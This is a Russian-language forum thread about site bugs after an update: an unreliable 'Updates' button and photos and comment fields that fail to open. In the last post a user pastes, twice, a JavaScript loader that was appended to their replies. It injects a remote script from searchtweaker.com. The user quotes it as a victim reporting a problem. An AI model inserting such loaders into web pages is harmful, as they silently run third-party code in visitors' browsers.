Как-то не очень работает кнопка "Обновления". Все время ей пользуюсь, а тут обратил внимание, что после того, как прочел "обновления", еще полно непрочитанных сообщений. Ужас!
У меня есть подозрения: я читаю форум с разных машин, с перс. компьютера, с планшета. Боюсь, что это от этого. Но может есть какое нибудь решение?
У меня на домашнем после этого обновления ни фото совершенно не открываются из превью, ни комментарии написать нельзя - просто "некуда", активная зона с курсором отсутствует. Впрочем, там и компьютер. и система , и браузер совсем уж старенькие.
Artem пишет: В любых браузерах, на любых компьютерах. Фото открываются, но через минуту-другую.
Нашел для себя решение проблемы. Если переключится между вкладками в браузере, то через просмотрщик сайта картинка открывается сразу, или же правой мышкой на просмотрщик-> открыть изображение и смотрим картинку в полном разрешении (тоже открывается моментально). Чистка кэша не помогла, компьютер тянет battlefield 4 (в смысле, не старый)
Алексей (Fronton) пишет: Как-то не очень работает кнопка "Обновления". Все время ей пользуюсь, а тут обратил внимание, что после того, как прочел "обновления", еще полно непрочитанных сообщений. Ужас!
У меня есть подозрения: я читаю форум с разных машин, с перс. компьютера, с планшета. Боюсь, что это от этого. Но может есть какое нибудь решение?
У меня то же самое примерно... Во вкладке "Обновления" они вроде все открываются, но на главной странице форума красным помечается не все новое. Причем определенные только темы...
Что-то при каждом ответе в пост снизу вставляется сам по себе какой-то скрипт. Вот такой: (function(){try{var header=document.getElementsByTagName("HEAD"[IMG][0];var script=document.createElement("SCRIPT"[IMG];script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded"[IMG]){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();